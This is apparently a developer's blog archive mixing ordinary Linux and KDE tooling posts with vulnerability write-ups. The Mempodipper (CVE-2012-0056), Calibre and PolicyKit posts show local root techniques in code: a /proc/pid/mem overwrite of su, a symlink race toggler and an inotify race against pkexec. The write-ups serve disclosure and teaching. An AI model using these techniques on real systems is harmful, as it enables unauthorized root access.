Author Archive

Nerdling Sapple: Simple Command-line Music File Organizer

I’ve been using this utility since I wrote it 6 years ago, and this afternoon, I cleaned up the code base in order to release it. It’s a simple command-line music file organizer. It takes a list of files or directories as program arguments, inspects the tags of all the enclosed music files, and then determines which directories need to be created and what the music file name should be. Plenty of GUI tools do this already, many of which are very customizable, but I have yet to see a command-line utility as simple as this that gets the job done.

My general routine for ingesting music acquired on the Interwebs is to load it up in Picard, EasyTag, or another tag editor to adjust the tags, and then run:

$ organizemusic ~/Downloads/some-silly-m4a-directory

And presto, all the music is moved into the right place.

It takes care of translating difficult non-ASCII characters into correct transliterations using libicu, and it uses Scott Wheeler’s taglib (of KDE fame) for reading the audio file tags.
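
The transliteration-plus-tags core is small enough to sketch. Here’s a rough, hypothetical miniature (not the actual organizemusic source; the destination layout shown is invented):

// Sketch only: compute a destination path from a file's tags, with
// non-ASCII characters transliterated to plain ASCII via libicu.
// g++ sketch.cpp -I/usr/include/taglib -ltag -licuuc -licui18n -o sketch
#include <taglib/fileref.h>
#include <taglib/tag.h>
#include <unicode/translit.h>
#include <unicode/unistr.h>
#include <iostream>
#include <memory>

// Turn e.g. "Björk" into "Bjork" using ICU's compound transliterator.
static std::string toAscii(const std::string &utf8)
{
	UErrorCode status = U_ZERO_ERROR;
	std::unique_ptr<icu::Transliterator> trans(
		icu::Transliterator::createInstance("Any-Latin; Latin-ASCII", UTRANS_FORWARD, status));
	if (U_FAILURE(status))
		return utf8;
	icu::UnicodeString text = icu::UnicodeString::fromUTF8(utf8);
	trans->transliterate(text);
	std::string out;
	text.toUTF8String(out);
	return out;
}

int main(int argc, char *argv[])
{
	if (argc != 2)
		return 1;
	TagLib::FileRef file(argv[1]);
	if (file.isNull() || !file.tag())
		return 1;
	TagLib::Tag *tag = file.tag();
	// Artist/Album/NN - Title is one plausible layout, not necessarily
	// the one organizemusic actually uses.
	std::cout << toAscii(tag->artist().to8Bit(true)) << "/"
	          << toAscii(tag->album().to8Bit(true)) << "/"
	          << tag->track() << " - "
	          << toAscii(tag->title().to8Bit(true)) << std::endl;
	return 0;
}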

Get it while it’s hot! You can browse the source here, look at the readme here, or clone and build it like this:

zx2c4@Dell ~ $ git clone http://git.zx2c4.com/music-file-organizer
Cloning into 'music-file-organizer'...
zx2c4@Dell ~ $ cd music-file-organizer/
zx2c4@Dell ~/music-file-organizer $ make
g++ -O3 -pipe -fomit-frame-pointer -march=native -I/usr/include/taglib    -ltag -licui18n -licuuc -licudata    readmusictags.cpp AudioFile.cpp AudioFile.h   -o readmusictags
g++ -O3 -pipe -fomit-frame-pointer -march=native -I/usr/include/taglib    -ltag -licui18n -licuuc -licudata    organizemusic.cpp AudioFile.cpp AudioFile.h   -o organizemusic

Nerdling Sapple: KRunner Dictionary Plugin: Complete

Over two years ago, I announced that I had written a dictionary plugin for KRunner. Many expected it would be merged immediately, but there was an unfortunate hiccup. Because of the particulars of KRunner’s threading, and the fact that the dictionary data engine needed to be accessed only from the main thread, Aaron Seigo said that he would add an AbstractRunner property called setReentrant that would allow for easily accessing data engines from KRunner’s match thread. That never materialized, and eventually I just presumed the plasma developers weren’t interested in adding this API themselves.

Not a problem, though. Now, two years on, I’ve decided to resurrect the runner and rewrite it using mutexes to work around the API’s threading limitations. The result turned out very clean, and so far in my testing it works without fail.
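
I won’t paste the runner itself here, but the general shape of the workaround is a familiar Qt pattern: the match thread queues a request to an object living in the main thread and sleeps on a wait condition until the answer arrives. A hedged sketch (not the actual dictionary runner code):

// Sketch of the pattern only: lookup() runs on the main thread (where
// the data engine may be touched), while lookupBlocking() is safe to
// call from KRunner's match thread. Assumes this object was created in
// the main thread, so queued slots are delivered there.
#include <QObject>
#include <QMutex>
#include <QWaitCondition>
#include <QString>

class MainThreadGate : public QObject
{
	Q_OBJECT
public slots:
	void lookup(const QString &word)
	{
		QMutexLocker locker(&m_mutex);
		// Stand-in for the real dictionary data engine query.
		m_result = QString("definition of %1").arg(word);
		m_done = true;
		m_condition.wakeAll();
	}
public:
	// Call only from a worker thread; calling this from the main thread
	// would deadlock, since the queued slot could never run.
	QString lookupBlocking(const QString &word)
	{
		QMutexLocker locker(&m_mutex);
		m_done = false;
		QMetaObject::invokeMethod(this, "lookup", Qt::QueuedConnection,
					  Q_ARG(QString, word));
		while (!m_done)
			m_condition.wait(&m_mutex); // releases the mutex while sleeping
		return m_result;
	}
private:
	QMutex m_mutex;
	QWaitCondition m_condition;
	QString m_result;
	bool m_done;
};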

It’s currently in kde-review, but I’m hoping to move it into plasma-addons and ship it with 4.10, now that it works well.

For the eager, you can try it out now with these commands:

svn co svn://anonsvn.kde.org/home/kde/trunk/kdereview/plasma/runners/dictionary dictionary-krunner
cd dictionary-krunner
cmake . -DCMAKE_INSTALL_PREFIX=$(kde4-config --prefix)
make
sudo make install
kbuildsycoca4
kquitapp krunner
krunner

Nerdling Sapple: OS X Local Root Vulnerabilities via OpenVPN Clients Tunnelblick and Viscosity

A few weeks ago my Vaio toasted out. I’ve been using an old Dell laptop as a replacement, which was previously being used as a NAS server box. To replace the NAS, I dusted off my sister’s old Macbook and tried to wrestle OS X into shape, including writing a patch for rsync to deal with OS X’s awful UTF-8 semantics (NFC vs NFD), but that is for another post. While waiting for things to transfer, I was auditing my colo, and I typed find / -type f -perm -4000 into the Mac’s SSH session by accident. Before I could Ctrl+C out of it, I thought, “hey, weird, why’s Tunnelblick need an SUID helper?”

Coincidentally, a friend was just touting the high-quality UNIX tools OS X has to offer. I was skeptical.

It turns out that the two most popular OpenVPN client/managers for Macintosh, Viscosity and Tunnelblick, both use incredibly insecure SUID helpers.

When either Viscosity or Tunnelblick is installed, an unprivileged user can escalate privileges to root.

Here are the relevant links:

Tunnelblick Vulnerability
Viscosity Vulnerability
CVE Assignment for Tunnelblick
CVE-2012-3483 1. A race condition (TOCTOU) in file permission checking can lead to local root.
CVE-2012-3484 2. Insufficient checking (merely for 0:0 ownership and 744 permissions) can lead to local root on systems with particular configurations.
CVE-2012-3485 3. Insufficient validation of path names can allow for arbitrary kernel module loading, which can lead to local root.
4. Insufficient validation of path names can allow execution of arbitrary scripts as root, leading to local root.
5. Insufficient path validation in errorExitIfAttackViaString can lead to deletion of files as root, leading to DoS.
CVE-2012-3486 6. Allowing OpenVPN to run with user-given configurations can lead to local root.
CVE-2012-3487 7. A race condition (TOCTOU) in process killing.
CVE Assignment for Viscosity
CVE-2012-4284 Insufficient validation of path names can allow execution of arbitrary Python code as root, leading to local root.

Nerdling Sapple: Stripe’s Capture the Flag — Solutions

Stripe released a capture-the-flag competition: a security challenge to exploit several contrived flaws. I solved all of them, and you can take a look at the solutions here. Here’s a video of a complete walkthrough:

Nerdling Sapple: Linux Local Privilege Escalation via SUID /proc/pid/mem Write

Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for directly reading and writing process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were deemed sufficient, and so the #ifdef that previously prevented write support for arbitrary process memory was removed. Anyone with the correct permissions could write to process memory. It turns out, of course, that the permission checking was done poorly. This means that all Linux kernels >= 2.6.39 are vulnerable, up until the fix commit from a couple days ago. Let’s take the old kernel code step by step and learn what’s the matter with it.

When /proc/pid/mem is opened, this kernel code is called:

static int mem_open(struct inode* inode, struct file* file)
{
	file->private_data = (void*)((long)current->self_exec_id);
	/* OK to pass negative loff_t, we can catch out-of-range */
	file->f_mode |= FMODE_UNSIGNED_OFFSET;
	return 0;
}

There are no restrictions on opening; anyone can open the /proc/pid/mem fd for any process (subject to the ordinary VFS restrictions). It simply makes note of the self_exec_id of the process doing the opening and stores it away for checking later during reads and writes.

Writes (and reads), however, have permissions checking restrictions. Let’s take a look at the write function:

static ssize_t mem_write(struct file * file, const char __user *buf,
			 size_t count, loff_t *ppos)
{
 
/* unimportant code removed for blog post */	
 
	struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);
 
/* unimportant code removed for blog post */
 
	mm = check_mem_permission(task);
	copied = PTR_ERR(mm);
	if (IS_ERR(mm))
		goto out_free;
 
/* unimportant code removed for blog post */	
 
	if (file->private_data != (void *)((long)current->self_exec_id))
		goto out_mm;
 
/* unimportant code removed for blog post
 * (the function here goes onto write the buffer into the memory)
 */

So there are two relevant checks in place to protect against unauthorized writes: check_mem_permission and self_exec_id. Let’s do the first one first and the second one second.

The code of check_mem_permission simply calls into __check_mem_permission, so here’s the code of that:

static struct mm_struct *__check_mem_permission(struct task_struct *task)
{
	struct mm_struct *mm;
 
	mm = get_task_mm(task);
	if (!mm)
		return ERR_PTR(-EINVAL);
 
	/*
	 * A task can always look at itself, in case it chooses
	 * to use system calls instead of load instructions.
	 */
	if (task == current)
		return mm;
 
	/*
	 * If current is actively ptrace'ing, and would also be
	 * permitted to freshly attach with ptrace now, permit it.
	 */
	if (task_is_stopped_or_traced(task)) {
		int match;
		rcu_read_lock();
		match = (ptrace_parent(task) == current);
		rcu_read_unlock();
		if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH))
			return mm;
	}
 
	/*
	 * No one else is allowed.
	 */
	mmput(mm);
	return ERR_PTR(-EPERM);
}

There are two ways that the memory write is authorized. Either task == current, meaning that the process being written to is the process writing, or current (the process writing) has esoteric ptrace-level permissions to play with task (the process being written to). Maybe you think you can trick the ptrace code? It’s tempting. But I don’t know. Let’s instead figure out how we can make a process write arbitrary memory to itself, so that task == current.

Now naturally, we want to write into the memory of suid processes, since then we can get root. Take a look at this:

$ su "yeeeee haw I am a cowboy"
Unknown id: yeeeee haw I am a cowboy

su will spit out whatever text you want onto stderr, prefixed by “Unknown id:”. So, we can open a fd to /proc/self/mem, lseek to the right place in memory for writing (more on that later), use dup2 to couple together stderr and the mem fd, and then exec su with shellcode as its argument to write a shell spawner into the process memory, and then we have root. Really? Not so easy.
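
In code, the naive plan looks something like this (a sketch only: the shellcode bytes are placeholders, and the offset is the exit@plt value derived later in this post):

// The naive attempt, sketched (and, as explained next, defeated by the
// self_exec_id check): alias our own mem fd onto stderr, then exec su.
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int main()
{
	const char shellcode[] = "\x31\xc0..."; /* placeholder bytes */
	int fd = open("/proc/self/mem", O_RDWR);
	// 0x402178 is exit@plt (derived below); su prefixes our "user name"
	// with "Unknown id: ", so start that many bytes earlier.
	lseek(fd, 0x402178 - strlen("Unknown id: "), SEEK_SET);
	dup2(fd, 2); // stderr now writes into the process's memory
	// The fd (and its offset) survive the exec, now pointing into su.
	execl("/bin/su", "su", shellcode, (char *)NULL);
	return 1; // only reached if execl fails
}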

Here the other restriction comes into play. After it passes the task == current test, it then checks whether the current self_exec_id matches the self_exec_id that the fd was opened with. What on earth is self_exec_id? It’s only referenced in a few places in the kernel. The most important one happens to be inside of exec:

void setup_new_exec(struct linux_binprm * bprm)
{
/* massive amounts of code trimmed for the purpose of this blog post */
 
	/* An exec changes our domain. We are no longer part of the thread
	   group */
 
	current->self_exec_id++;
 
	flush_signal_handlers(current, 0);
	flush_old_files(current->files);
}
EXPORT_SYMBOL(setup_new_exec);

self_exec_id is incremented each time a process execs. So in this case, it functions so that you can’t open the fd in a non-suid process, dup2, and then exec to a suid process… which is exactly what we were trying to do above. Pretty clever way of deterring our attack, eh?

Here’s how to get around it. We fork a child, and inside of that child, we exec to a new process. The initial child fork has a self_exec_id equal to its parent’s. When the child execs to a new process, its self_exec_id increments by one. Meanwhile, the parent itself is busy execing to our shellcode-writing su process, so its self_exec_id gets incremented to the same value. So here is what we do: we make this child fork and exec to a new process, and inside of that new process, we open up a fd to /proc/parent-pid/mem using the pid of the parent process, not our own process (as before). We can open the fd like this because there is no permissions checking for a mere open. At open time, the child’s self_exec_id has already been incremented to the value that the parent’s self_exec_id will have once it execs su. So finally, we pass our opened fd from the child process back to the parent process (using some very black unix domain sockets magic), do our dup2ing, and exec into su with the shell code.
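
That “unix domain sockets magic” is ordinary SCM_RIGHTS file descriptor passing over a socketpair. A minimal sketch (not the exploit’s actual code; error handling trimmed):

// Sketch of SCM_RIGHTS fd passing, used to hand the child's
// /proc/parent-pid/mem fd back to the parent. The sockets would come
// from socketpair(AF_UNIX, SOCK_STREAM, 0, sv).
#include <sys/socket.h>
#include <sys/uio.h>
#include <string.h>

void send_fd(int sock, int fd)
{
	char dummy = '!';
	struct iovec iov = { &dummy, sizeof(dummy) };
	char control[CMSG_SPACE(sizeof(int))] = { 0 };
	struct msghdr msg = {};
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = control;
	msg.msg_controllen = sizeof(control);
	struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS; // the payload is a file descriptor
	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
	memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
	sendmsg(sock, &msg, 0);
}

int recv_fd(int sock)
{
	char dummy;
	struct iovec iov = { &dummy, sizeof(dummy) };
	char control[CMSG_SPACE(sizeof(int))] = { 0 };
	struct msghdr msg = {};
	msg.msg_iov = &iov;
	msg.msg_iovlen = 1;
	msg.msg_control = control;
	msg.msg_controllen = sizeof(control);
	recvmsg(sock, &msg, 0);
	int fd; // the kernel installs a duplicate fd in our table
	memcpy(&fd, CMSG_DATA(CMSG_FIRSTHDR(&msg)), sizeof(int));
	return fd;
}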

There is one remaining objection. Where do we write to? We have to lseek to the proper memory location before writing, and ASLR randomizes processes’ address spaces, making it impossible to know where to write to. Should we spend time working on more cleverness to figure out how to read process memory, and then carry out a search? No. Check this out:

$ readelf -h /bin/su | grep Type
  Type:                              EXEC (Executable file)

This means that su does not have a relocatable .text section (otherwise it would spit out “DYN” instead of “EXEC”). It turns out that su on the vast majority of distros is not compiled with PIE, disabling ASLR for the .text section of the binary! So we’ve chosen su wisely. The offsets in memory will always be the same. So to find the right place to write to, let’s check out the assembly surrounding the printing of the “Unknown id: blabla” error message.

It gets the error string here:

  403677:       ba 05 00 00 00          mov    $0x5,%edx
  40367c:       be ff 64 40 00          mov    $0x4064ff,%esi
  403681:       31 ff                   xor    %edi,%edi
  403683:       e8 e0 ed ff ff          callq  402468 <dcgettext@plt>

And then writes it to stderr:

  403688:       48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi        # 6087e8 <stderr>
  40368f:       48 89 c2                mov    %rax,%rdx
  403692:       b9 20 88 60 00          mov    $0x608820,%ecx
  403697:       be 01 00 00 00          mov    $0x1,%esi
  40369c:       31 c0                   xor    %eax,%eax
  40369e:       e8 75 ea ff ff          callq  402118 <__fprintf_chk@plt>

Closes the log:

  4036a3:       e8 f0 eb ff ff          callq  402298 <closelog@plt>

And then exits the program:

  4036a8:       bf 01 00 00 00          mov    $0x1,%edi
  4036ad:       e8 c6 ea ff ff          callq  402178 <exit@plt>

We therefore want to use 0x402178, which is the exit function it calls. We can, in an exploit, automate the finding of the exit@plt symbol with a simple bash one-liner:

$ objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'
0x402178

So naturally, we want to write to 0x402178 minus the number of letters in the string “Unknown id: ”, so that our shellcode is placed at exactly the right place.

The shellcode should be simple and standard. It sets the uid and gid to 0 and execs into a shell. If we want to be clever, we can also preserve stderr: before dup2ing the memory fd onto stderr, we dup stderr to another fd, and then in the shellcode, we dup2 that other fd back onto stderr.
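
Expressed as C, the payload is roughly the following (a sketch of the idea, not a disassembly of the actual handwritten payload):

// Roughly what the shellcode does, as C. saved_stderr is the spare fd
// we dup'd stderr to before the overwrite.
#include <unistd.h>

void payload(int saved_stderr)
{
	dup2(saved_stderr, 2); // restore the real stderr (the "clever" bit)
	setgid(0);             // we're running inside suid-root su, so these succeed
	setuid(0);
	execl("/bin/sh", "sh", (char *)NULL);
}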

In the end, the exploit works like a charm with total reliability:

 
CVE-2012-0056 $ ls
build-and-run-exploit.sh  build-and-run-shellcode.sh  mempodipper.c  shellcode-32.s  shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================
 
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2#

You can watch a video of it in action:

As always, thanks to Dan Rosenberg for his continued advice and support. I’m currently not releasing any source code, as Linus only very recently patched it. After a responsible amount of time passes or if someone else does first, I’ll publish. If you’re a student trying to learn about things or have otherwise legitimate reasons, we can talk.

Update: evidently, and somewhat ironically, some other folks used this blog post to make their own exploits and published them. So, here’s mine. I wrote the shellcode for 32-bit and 64-bit by hand. Enjoy!

Update 2: as it turns out, Fedora very aptly compiles their su with PIE, which defeats this attack. They do not, unfortunately, compile all their SUID binaries with PIE, and so this attack is still possible with, for example, gpasswd. The code to do this is in the “fedora” branch of the git repository, and a video demonstration is also available.

Update 3: Gentoo is smart enough to remove read permissions on SUID binaries, making it impossible to find the exit@plt offset using objdump. I determined another way to do this, using ptrace. Ptrace allows debugging of any program in memory. For SUID programs, ptracing drops the elevated privileges, but that’s fine, since we simply want to find internal memory locations. By parsing the opcode of the binary at the right time, we can decipher the target address of the next call after the printing of the error message. I’ve created a standalone utility that returns the offset, as well as integrating it into the main mempodipper source.
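
For flavor, the decoding step might look something like this (a sketch under big assumptions: the attach-and-step plumbing is omitted, and child and rip are taken as given):

// Sketch: with the traced child stopped right before the call we care
// about, read the instruction at rip and decode a rel32 call (opcode
// 0xe8) into its absolute target.
#include <sys/ptrace.h>
#include <sys/types.h>
#include <errno.h>
#include <stdint.h>

unsigned long call_target(pid_t child, unsigned long rip)
{
	errno = 0;
	long word = ptrace(PTRACE_PEEKTEXT, child, (void *)rip, NULL);
	if (errno || (word & 0xff) != 0xe8)
		return 0; // read failed, or not a rel32 call
	// Little-endian: bytes 1-4 of the word are the signed displacement,
	// relative to the instruction after the 5-byte call.
	int32_t rel = (int32_t)((unsigned long)word >> 8);
	return rip + 5 + (long)rel;
}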

As always, this work is strictly academic, and is not intended for use beyond research and education.

Nerdling Sapple: FOSDEM from Paris

I just moved to Paris, which means I’m finally in the right proximity at the right time for attending an open source conference. I’m not sure what the scoop is with the Parisian KDE community — if it exists or is vibrant, if there’s camaraderie, or what the situation is. But, in case there is a good vibe brewing inside the Paris OSS community, what do you say we all band together to attend FOSDEM? Leave our city for Brussels in a festive caravan on Friday night (or possibly just a train) and come back Sunday night? If there’s interest, email me at jason [at] zx2c4 dot com or leave a comment below.

Nerdling Sapple: KDE Doesn’t Suck Anymore, People Finally Realize

TechRadar has decided that KDE is the most usable desktop compared to Gnome and Unity. A few days prior to the publication of this article, my friend John emailed me to write:

I’m using Kde on my computer at work and it is amazing. It’s improved so much that it’s now stable and highly usable.

I tried Unity (I’m using Ubuntu) and it was unusable. Gnome 3 was better but had massive issues with my second screen (dual screen setup with nvidia gpu running in twin view). Gnome 3 was still lacking in the productivity area though. Lxde worked great but I don’t want to use a desktop that looks and feels like Windows 95… Also Lxde has few apps so I had to pull in gnome or kde ones…

I also had issues with Ubuntu’s lightdm but switching to kdm fixed that. So far Kde is the only desktop that fully works, feels good, looks good and has apps for every task.

John

Sent from my phone

Finally folks are figuring out that KDE doesn’t suck anymore.


Update: Adam Weiss writes with a political comparison:

Gnome 3, Unity…they are like the George W. Bush of the non-KDE Linux desktop movement. Instead of taking care of the real issues on the desk, they went gallivanting off into the netbook world, dropping bombs all over the place and even to this day nobody can really figure out what the point of netbooks is…

Nerdling Sapple: Exploit Round Up: Calibre Fiasco & LD_AUDIT

A few weeks ago, I posted an exploit and a bug report for a Linux local root exploit in Calibre. The author, Kovid Goyal, became incensed, and rather than work with me to fix it, he insulted my colleagues and me. After each one of his fixes, I released a new exploit breaking the latest fix. It got a lot of social media hype, and was kind of a big deal. After several days of media frenzy and bad publicity, the stubborn developer finally bent to the advice of the chorus of leading security researchers, and the mount helper was removed in its entirety. In any case, the exploits show some neat race condition tricks that you might want to check out, using inotify and a toggler.

  • Hilarious bug report
  • Important news article
  • Social media hype
  • More social media hype
  • Compliment from famous hacker
  • oss-security mailing list discussion
  • Obscene praise from script-kiddie
  • First Exploit
  • Second Exploit
  • Third Exploit
  • Most Glorious Fourth Exploit

There’s plenty of technical explanation in the comments of the exploit code.
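
The toggler idea, in a nutshell: flip a path back and forth between something innocuous and the target you actually want, hoping to land inside the helper’s check-then-use window. A minimal sketch (illustrative paths, not the actual Calibre exploit):

// Minimal sketch of a symlink toggler for winning check-then-use races.
#include <unistd.h>

int main()
{
	// Alternate what /tmp/toggle points to as fast as possible. If the
	// victim checks during an "innocuous" phase and then acts during a
	// "target" phase, the race is won.
	for (;;) {
		unlink("/tmp/toggle");
		symlink("/tmp/innocuous", "/tmp/toggle");
		unlink("/tmp/toggle");
		symlink("/etc/passwd", "/tmp/toggle");
	}
}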

    CVE Assignment for Calibre
    CVE-2011-4124 1. Ability to create root owned directory anywhere. The mount helper calls mkdir(argv[3], …).
    2. Ability to remove any empty directory on the system.
    3. Ability to create user_controlled_dir/.created_by_calibre_mount_helper anywhere on the filesystem.
    4. Ability to delete user_controlled_dir/.created_by_calibre_mount_helper anywhere on the filesystem.
    5. Ability to inject arguments into ‘mount’ being exec’d. On lines 78, 81, and 83, the final two arguments to mount are user controlled. On lines 103, 106, 108, 139, and 141, the last argument to unmount/eject is user controlled. The “exists()” check can be subverted via race condition or by creating an existing file in the working directory with a filename equal to the desired injected argument.
    6. Ability to unmount any device.
    CVE-2011-4125 7. Ability to execute any program as root. The mount helper makes use of execlp on lines 78, 81, 83, 103, 106, 108, 139, and 141, and the first argument does not start with a / character. Because of this, execlp will search PATH for the executable to run. PATH is user controlled, and thus it is trivial to write a program that spawns a shell, name it “mount”, and point PATH at its directory.
    CVE-2011-4126 8. Race condition, allowing the ability to mount any device to anywhere. This leads to local root, since you can mount over /etc/ or /etc/pam.d/.

    My first three CVEs.


    After that, I decided to learn about linker bugs, so I reread Tavis’s two excellent write-ups on CVE-2010-3856 and CVE-2010-3847. I saw that there was room for writing a newer exploit based on his research that did not depend on having read access to SUID executables or having a cron daemon installed, so I wrote I Can’t Read and I Won’t Race You Either. The source has plenty of explanation. I also suggest reading Tim Brown’s excellent paper on linker bugs.

    Nerdling Sapple: Set Wallpaper from Command-line in KDE4

    So far as I can tell, changing your wallpaper (using the default wallpaper plugin, not any fancy scripted wallpaper plugins) from the command line in KDE4 is needlessly hard. I have to write a JavaScript file to a temporary location, make a dbus call to load it into an interactive window, and then use xdotool to simulate keystrokes to run it. Jiminy cricket. But below is how I have it done. If there’s an easier way that I’ve missed, pleeeaassseee let me know in the comments.

    set-wallpaper.sh:

    #!/bin/sh
    js=$(mktemp)
    cat > $js <<_EOF
    var wallpaper = "$1";
    var activity = activities()[0];
    activity.currentConfigGroup = new Array("Wallpaper", "image");
    activity.writeConfig("wallpaper", wallpaper);
    activity.writeConfig("userswallpaper", wallpaper);
    activity.reloadConfig();
    _EOF
    qdbus org.kde.plasma-desktop /App local.PlasmaApp.loadScriptInInteractiveConsole "$js" > /dev/null
    xdotool search --name "Desktop Shell Scripting Console – Plasma Desktop Shell" windowactivate key ctrl+e key ctrl+w
    rm -f "$js"

    Nerdling Sapple: Convert Office Documents to PDF with GDocs from Bash

    I’ve figured out how to script the Google Documents Viewer into reading any office document — doc, docx, xls, xlsx, odt, ods, and probably a bunch of others — and converting it to PDF. There are tons of tools, such as unoconv, but Google’s service is well sandboxed, which makes it a nice choice if you want to convert untrusted documents, such as in the case of a web service. So without further ado, here you go:

    convert-url-to-pdf.sh:

    #!/bin/sh
     
    # by Jason A. Donenfeld
    # www.zx2c4.com
     
    if [ $# -ne 2 ]; then
            echo "Usage: $0 url output-pdf-file"
            exit 1
    fi
     
    set -e
    documenturl="$(echo -n "$1" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g')"
    viewerurl="http://docs.google.com/viewer?url=$documenturl"
    pdfurl="$(printf "$(curl -s "$viewerurl" | sed -n "s/.*gpUrl:'\\([^']*\\)'.*/\\1/p" | sed 's/%/%%/g')")"
    cookiejar="$(mktemp)"
    curl -s -L -c "$cookiejar" -o "$2" "$pdfurl"
    rm -f "$cookiejar"

    Nerdling Sapple: Monkey Patching Ugly Ebuilds — Disabling HPLIP’s Autostart

    Gentoo’s HP printer drivers package, net-print/hplip, if you have the gui USE flag enabled, installs /etc/xdg/autostart/hplip-systray.desktop, which makes an awful Windows-like tray app load with all desktop environments for every user on the machine. Who wants this? Every user? Tray app? Autostart? This is Linux, not Windows, right?

    Upstream, i.e. the Gentoo devs, don’t seem to want to add an autostart USE flag. I don’t feel like maintaining my own ebuild for this, either. So, the official advice is to copy hplip-systray.desktop into a special place in your own home folder, and then edit the file to have Hidden=true. Yuck. So now my start-up routine will have to spend extra CPU cycles resolving the override, not to mention the requirement for each and every user on my machine to do this. Sure I could add this extra file to the default set of files copied into each home folder on user creation for each desktop environment, but do I really want to do this? What about preexisting users? Do I really want this system installed package to require this kind of manual intervention? The obvious thing to do is just to delete /etc/xdg/autostart/hplip-systray.desktop after each time hplip installs, namely, after each update.

    But the official advice calls this approach “naive”. Fuck that. I don’t want the extra overhead of working out the collision, nor do I want to have to add this file to each user’s home folder. I want that file gone, dead, vamos‘d. The thing is, it means I have to manually remove the file after each time the ebuild gets updated (and remember, I don’t want to maintain my own fork of the ebuild).

    Fortunately, there’s a solution: Portage allows per-package environment variable overrides via /etc/portage/env/. By putting some monkey patching code in the right place, we can override a function inside of all subsequent hplip ebuilds to automagically remove the ugly file. Create the right directory:

    sudo mkdir -p /etc/portage/env/net-print

    Then, add my monkey patch code to it:

    sudo vim /etc/portage/env/net-print/hplip
    if ( ! type -t original_src_install >/dev/null) && (type -t src_install >/dev/null); then
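            # `declare -f src_install` prints the function's definition; `tail -n +2`
            # drops its name line, and the echo supplies a new one, so the eval
            # defines original_src_install() with the body of the existing src_install.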
            eval "$(echo 'original_src_install()'; declare -f src_install | tail -n +2)"
            src_install() {
                    original_src_install
                    rm -f "${D}"/etc/xdg/autostart/hplip-systray.desktop || die
            }
    fi

    Finally, re-emerge hplip, and it should install without the autostart file. Yes, this is one ugly bash-ism, but it seems to do the job. Any suggestions would be appreciated.


    Update: A reader below has noted that a far superior way of doing this is to just put

    INSTALL_MASK="/etc/xdg/autostart/hplip-systray.desktop $INSTALL_MASK"

    inside of /etc/portage/env/net-print/hplip, without needing to do the monkey patching above. INSTALL_MASK is a great feature, one that is not highlighted very much at all in the documentation. The most official mention of it I could find is in make.conf‘s man page:

           INSTALL_MASK = [space delimited list of file names]
                  Use this variable if you want  to  selectively  prevent  certain
                  files  from  being copied into your file system tree.  This does
                  not work on symlinks, but only on actual files.  Useful  if  you
                  wish  to  filter  out  files  like  HACKING.gz  and TODO.gz. The
                  INSTALL_MASK is processed just before a package is merged.  Also
                  supported  is  a  PKG_INSTALL_MASK variable that behaves exactly
                  like INSTALL_MASK except that it is processed just  before  cre‐
                  ation of a binary package.
    

    Internally in misc-functions.sh, it does essentially the same thing as my monkey patch:

    install_mask() {
    	local root="$1"
    	shift
    	local install_mask="$*"
     
    	# we don't want globbing for initial expansion, but afterwards, we do
    	local shopts=$-
    	set -o noglob
    	for no_inst in ${install_mask}; do
    		set +o noglob
    		quiet_mode || einfo "Removing ${no_inst}"
    		# normal stuff
    		rm -Rf "${root}"/${no_inst} >&/dev/null
     
    		# we also need to handle globs (*.a, *.h, etc)
    		find "${root}" \( -path "${no_inst}" -or -name "${no_inst}" \) \
    			-exec rm -fR {} \; >/dev/null 2>&1
    	done
    	# set everything back the way we found it
    	set +o noglob
    	set -${shopts}
    }

    Nerdling Sapple: PolicyKit Pwnage: linux local privilege escalation on polkit-1

    It’s been 6 months since I reported it, which I figure is a responsible amount of time to wait before releasing a local root exploit for Linux that targets polkit-1 <= 0.101, CVE-2011-1485, a race condition in PolicyKit. I present you with PolicyKit Pwnage.

    David Zeuthen of Redhat explains on the original bug report:

    Briefly, the problem is that the UID for the parent process of pkexec(1) is read from /proc by stat(2)’ing /proc/PID. The problem with this is that this returns the effective uid of the process which can easily be set to 0 by invoking a setuid-root binary such as /usr/bin/chsh in the parent process of pkexec(1). Instead we are really interested in the real-user-id. While there’s a check in pkexec.c to avoid this problem (by comparing it to what we expect the uid to be – namely that of the pkexec.c process itself which is the uid of the parent process at pkexec-spawn-time), there is still a short window where an attacker can fool pkexec/polkitd into thinking that the parent process has uid 0 and is therefore authorized. It’s pretty hard to hit this window – I actually don’t know if it can be made to work in practice.

    Well, here is, in fact, how it’s made to work in practice. There is, as he said, an attempted mitigation, and the way to trigger that mitigation path is something like this:

         $ sudo -u `whoami` pkexec sh
         User of caller (0) does not match our uid (1000)

    Not what we want. So the trick is to execl to a suid binary at just the precise moment /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed, and execl to the suid binary as our very next instruction.

    	if (fork()) {
    		int fd;
    		char pid_path[1024];
    		sprintf(pid_path, "/proc/%i", getpid());
    		printf("[+] Configuring inotify for proper pid.\n");
    		close(0); close(1); close(2);
    		fd = inotify_init();
    		if (fd < 0)
    			perror("[-] inotify_init");
    		inotify_add_watch(fd, pid_path, IN_ACCESS);
    		read(fd, NULL, 0);

    All the code up to this point makes this process block until /proc/PID is read, at which point it:

    		execl("/usr/bin/chsh", "chsh", NULL);

